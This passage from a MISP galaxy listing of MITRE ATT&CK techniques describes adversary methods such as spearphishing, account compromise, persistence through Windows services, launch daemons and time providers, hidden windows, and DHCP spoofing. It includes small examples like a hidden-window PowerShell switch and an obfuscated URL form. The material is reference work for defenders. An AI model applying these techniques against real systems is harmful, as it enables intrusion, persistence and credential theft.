The tag is: misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1562.006"

Table 6116. Table References

Links

https://attack.mitre.org/techniques/T1562/006

https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-events

https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63

https://ptylu.github.io/content/report/report.html?report=25

https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A

Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place.

Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an "IDN homograph attack").(Citation: CISA IDN ST05-016) URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, hxxp://google.com@1157586937.(Citation: Mandiant URL Obfuscation 2023)

Adversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishing 2021)

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002"

Table 6117. Table References

Links

https://attack.mitre.org/techniques/T1566/002

https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks

https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide

https://us-cert.cisa.gov/ncas/tips/ST05-016

https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf

https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse

https://www.microsoft.com/security/blog/2021/07/14/microsoft-delivers-comprehensive-solution-to-battle-rise-in-consent-phishing-emails/

Email Accounts - T1586.002

Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566), or large-scale spam email campaigns. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).

A variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.(Citation: AnonHBGary)(Citation: Microsoft DEV-0537) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Adversaries may target compromising well-known email accounts or domains from which malicious spam or [Phishing](https://attack.mitre.org/techniques/T1566) emails may evade reputation-based email filtering rules.

Adversaries can use a compromised email account to hijack existing email threads with targets of interest.

The tag is: misp-galaxy:mitre-attack-pattern="Email Accounts - T1586.002"

Table 6118. Table References

Links

https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/

https://attack.mitre.org/techniques/T1586/002

https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/

Service Execution - T1569.002

Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](https://attack.mitre.org/software/S0039).

[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Tools such as [PsExec](https://attack.mitre.org/software/S0029) and <code>sc.exe</code> can accept remote servers as arguments and may be used to conduct remote execution.

Adversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.

The tag is: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002"

Table 6119. Table References

Links

https://attack.mitre.org/techniques/T1569/002

https://docs.microsoft.com/windows/win32/services/service-control-manager

https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx

Email Addresses - T1589.002

Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.

Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Email addresses could also be enumerated via more active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)), such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) For example, adversaries may be able to enumerate email addresses in Office 365 environments by querying a variety of publicly available API endpoints, such as autodiscover and GetCredentialType.(Citation: GitHub Office 365 User Enumeration)(Citation: Azure Active Directory Reconnaisance)

Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Brute Force](https://attack.mitre.org/techniques/T1110) via [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="Email Addresses - T1589.002"

Table 6120. Table References

Links

https://attack.mitre.org/techniques/T1589/002

https://github.com/gremwell/o365enum

https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/

https://o365blog.com/post/just-looking/

https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/

https://www.hackers-arise.com/email-scraping-and-maltego

Spearphishing Attachment - T1598.002

Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1598.002"

Table 6121. Table References

Links

https://attack.mitre.org/techniques/T1598/002

https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide

https://github.com/ryhanson/phishery

https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/

https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf

Windows Service - T1543.003

Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service’s executable or recovery programs/commands, is stored in the Windows Registry.

Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API.

Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: .sys) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as CreateServiceW() (or manually via functions such as ZwLoadDriver() and ZwSetValueKey()), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as PnPUtil.exe.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020)

Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component).

The tag is: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003"

Table 6122. Table References

Links

https://attack.mitre.org/techniques/T1543/003

https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697

https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection

https://technet.microsoft.com/en-us/library/cc772408.aspx

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://unit42.paloaltonetworks.com/acidbox-rare-malware/

https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/

https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

Code Repositories - T1593.003

Adversaries may search public code repositories for information about victims that can be used during targeting. Victims may store code in repositories on various third-party websites such as GitHub, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.

Adversaries may search various public code repositories for various information about a victim. Public code repositories can often be a source of various general information about victims, such as commonly used programming languages and libraries as well as the names of employees. Adversaries may also identify more sensitive data, including accidentally leaked credentials or API keys.(Citation: GitHub Cloud Service Credentials) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)).

Note: This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1213/003), which focuses on [Collection](https://attack.mitre.org/tactics/TA0009) from private and internally hosted code repositories.

The tag is: misp-galaxy:mitre-attack-pattern="Code Repositories - T1593.003"

Table 6123. Table References

Links

https://attack.mitre.org/techniques/T1593/003

https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/

Contact List - T1636.003

Adversaries may utilize standard operating system APIs to gather contact list data. On Android, this can be accomplished using the Contacts Content Provider. On iOS, this can be accomplished using the Contacts framework.

If the device has been jailbroken or rooted, an adversary may be able to access the [Contact List](https://attack.mitre.org/techniques/T1636/003) without the user’s knowledge or approval.

The tag is: misp-galaxy:mitre-attack-pattern="Contact List - T1636.003"

Table 6124. Table References

Links

https://attack.mitre.org/techniques/T1636/003

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html

Launch Daemon - T1543.004

Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)

Adversaries may install a Launch Daemon configured to execute at startup by using the <code>RunAtLoad</code> parameter set to <code>true</code> and the <code>Program</code> parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. [Masquerading](https://attack.mitre.org/techniques/T1036)). When the Launch Daemon is executed, the program inherits administrative permissions.(Citation: WireLurker)(Citation: OSX Malware Detection)

Additionally, system configuration changes (such as the installation of third party package managing software) may cause folders such as <code>usr/local/bin</code> to become globally writeable. So, it is possible for poor configurations to allow an adversary to modify executables referenced by current Launch Daemon’s plist files.(Citation: LaunchDaemon Hijacking)(Citation: sentinelone macos persist Jun 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1543.004"

Table 6125. Table References

Links

https://attack.mitre.org/techniques/T1543/004

https://bradleyjkemp.dev/post/launchdaemon-hijacking/

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf

https://www.real-world-systems.com/docs/launchdPlist.1.html

https://www.sentinelone.com/blog/how-malware-persists-on-macos/

https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Hidden Window - T1564.003

Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks.

On Windows, there are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is <code>powershell.exe -WindowStyle Hidden</code>. (Citation: PowerShell About 2019)

Similarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be <code>apple.awt.UIElement</code>, which allows for Java applications to prevent the application’s icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don’t also want to show up in the Dock.

Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)

The tag is: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003"

Table 6126. Table References

Links

https://attack.mitre.org/techniques/T1564/003

https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/

https://docs.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Core/About/about_PowerShell_exe?view=powershell-5.1

Time Providers - T1547.003

Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.(Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.(Citation: Microsoft TimeProvider)

Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\</code>.(Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.(Citation: Microsoft TimeProvider)

Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.(Citation: Github W32Time Oct 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Time Providers - T1547.003"

Table 6127. Table References

Links

https://attack.mitre.org/techniques/T1547/003

https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings

https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top

https://github.com/scottlundgren/w32time

https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx

https://technet.microsoft.com/en-us/sysinternals/bb963902

SMS Messages - T1636.004

Adversaries may utilize standard operating system APIs to gather SMS messages. On Android, this can be accomplished using the SMS Content Provider. iOS provides no standard API to access SMS messages.

If the device has been jailbroken or rooted, an adversary may be able to access [SMS Messages](https://attack.mitre.org/techniques/T1636/004) without the user’s knowledge or approval.

The tag is: misp-galaxy:mitre-attack-pattern="SMS Messages - T1636.004"

Table 6128. Table References

Links

https://attack.mitre.org/techniques/T1636/004

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html

DHCP Spoofing - T1557.003

Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the victim network. By achieving the adversary-in-the-middle (AiTM) position, adversaries may collect network communications, including passed credentials, especially those sent over insecure, unencrypted protocols. This may also enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).

DHCP is based on a client-server model and has two functionalities: a protocol for providing network configuration settings from a DHCP server to a client and a mechanism for allocating network addresses to clients.(Citation: rfc2131) The typical server-client interaction is as follows:

  1. The client broadcasts a DISCOVER message.

  2. The server responds with an OFFER message, which includes an available network address.

  3. The client broadcasts a REQUEST message, which includes the network address offered.

  4. The server acknowledges with an ACK message and the client receives the network configuration parameters.

Adversaries may spoof as a rogue DHCP server on the victim network, from which legitimate hosts may receive malicious network configurations. For example, malware can act as a DHCP server and provide adversary-owned DNS servers to the victimized computers.(Citation: new_rogue_DHCP_serv_malware)(Citation: w32.tidserv.g) Through the malicious network configurations, an adversary may achieve the AiTM position, route client traffic through adversary-controlled systems, and collect information from the client network.

DHCPv6 clients can receive network configuration information without being assigned an IP address by sending a <code>INFORMATION-REQUEST (code 11)</code> message to the <code>All_DHCP_Relay_Agents_and_Servers</code> multicast address.(Citation: rfc3315) Adversaries may use their rogue DHCP server to respond to this request message with malicious network configurations.

Rather than establishing an AiTM position, adversaries may also abuse DHCP spoofing to perform a DHCP exhaustion attack (i.e, [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)) by generating many broadcast DISCOVER messages to exhaust a network’s DHCP allocation pool.

The tag is: misp-galaxy:mitre-attack-pattern="DHCP Spoofing - T1557.003"

Table 6129. Table References

Links

https://attack.mitre.org/techniques/T1557/003

https://datatracker.ietf.org/doc/html/rfc2131

https://datatracker.ietf.org/doc/html/rfc3315

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800668(v=ws.11)

https://isc.sans.edu/forums/diary/new+rogueDHCP+server+malware/6025/

https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/

https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2

Cloud Accounts - T1585.003

Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, MEGA, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)

Creating [Cloud Accounts](https://attack.mitre.org/techniques/T1585/003) may also require adversaries to establish [Email Accounts](https://attack.mitre.org/techniques/T1585/002) to register with the cloud provider.

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1585.003"

Table 6130. Table References

Links

https://attack.mitre.org/techniques/T1585/003

https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/

XPC Services - T1559.003

Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)

Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application’s XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).

The tag is: misp-galaxy:mitre-attack-pattern="XPC Services - T1559.003"

Table 6131. Table References

Links

https://attack.mitre.org/techniques/T1559/003

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html

https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/

https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html

Wordlist Scanning - T1595.003

Adversaries may iteratively probe infrastructure using brute-forcing and crawling techniques. While this technique employs similar methods to [Brute Force](https://attack.mitre.org/techniques/T1110), its goal is the identification of content and infrastructure rather than the discovery of valid credentials. Wordlists used in these scans may contain generic, commonly used names and file extensions or terms specific to a particular software. Adversaries may also create custom, target-specific wordlists using data gathered from other Reconnaissance techniques (ex: [Gather Victim Org Information](https://attack.mitre.org/techniques/T1591), or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).

For example, adversaries may use web content discovery tools such as Dirb, DirBuster, and GoBuster and generic or custom wordlists to enumerate a website’s pages and directories.(Citation: ClearSky Lebanese Cedar Jan 2021) This can help them to discover old, vulnerable pages or hidden administrative portals that could become the target of further operations (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [Brute Force](https://attack.mitre.org/techniques/T1110)).

As cloud storage solutions typically use globally unique names, adversaries may also use target-specific wordlists and tools such as s3recon and GCPBucketBrute to enumerate public and private buckets on cloud infrastructure.(Citation: S3Recon GitHub)(Citation: GCPBucketBrute) Once storage objects are discovered, adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530) to access valuable information that can be exfiltrated or used to escalate privileges and move laterally.

The tag is: misp-galaxy:mitre-attack-pattern="Wordlist Scanning - T1595.003"

Table 6132. Table References

Links

https://attack.mitre.org/techniques/T1595/003

https://github.com/clarketm/s3recon

https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/

https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf

Cloud Accounts - T1586.003

Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)

A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1586.003"

Table 6133. Table References

Links

https://attack.mitre.org/techniques/T1586/003

https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/

https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/

DNS Calculation - T1568.003

Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)

One implementation of [DNS Calculation](https://attack.mitre.org/techniques/T1568/003) is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.(Citation: Meyers Numbered Panda)(Citation: Moran 2014)(Citation: Rapid7G20Espionage)

The tag is: misp-galaxy:mitre-attack-pattern="DNS Calculation - T1568.003"

Table 6134. Table References

Links

http://www.crowdstrike.com/blog/whois-numbered-panda/

https://attack.mitre.org/techniques/T1568/003

https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/

https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html

Web Services - T1583.006

Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.

The tag is: misp-galaxy:mitre-attack-pattern="Web Services - T1583.006"

Table 6135. Table References

Links

https://attack.mitre.org/techniques/T1583/006

https://threatconnect.com/blog/infrastructure-research-hunting/

Digital Certificates - T1596.003

Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.

Adversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup) Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).(Citation: Medium SSL Cert) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: misp-galaxy:mitre-attack-pattern="Digital Certificates - T1596.003"

Table 6136. Table References

Links

https://attack.mitre.org/techniques/T1596/003

https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2

https://www.sslshopper.com/ssl-checker.html

Digital Certificates - T1587.003

Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner’s identity, and the digital signature of an entity that has verified the certificate’s contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).

Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)).

After creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.

The tag is: misp-galaxy:mitre-attack-pattern="Digital Certificates - T1587.003"

Table 6137. Table References

Links

https://attack.mitre.org/techniques/T1587/003

https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html

Employee Names - T1589.003

Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.

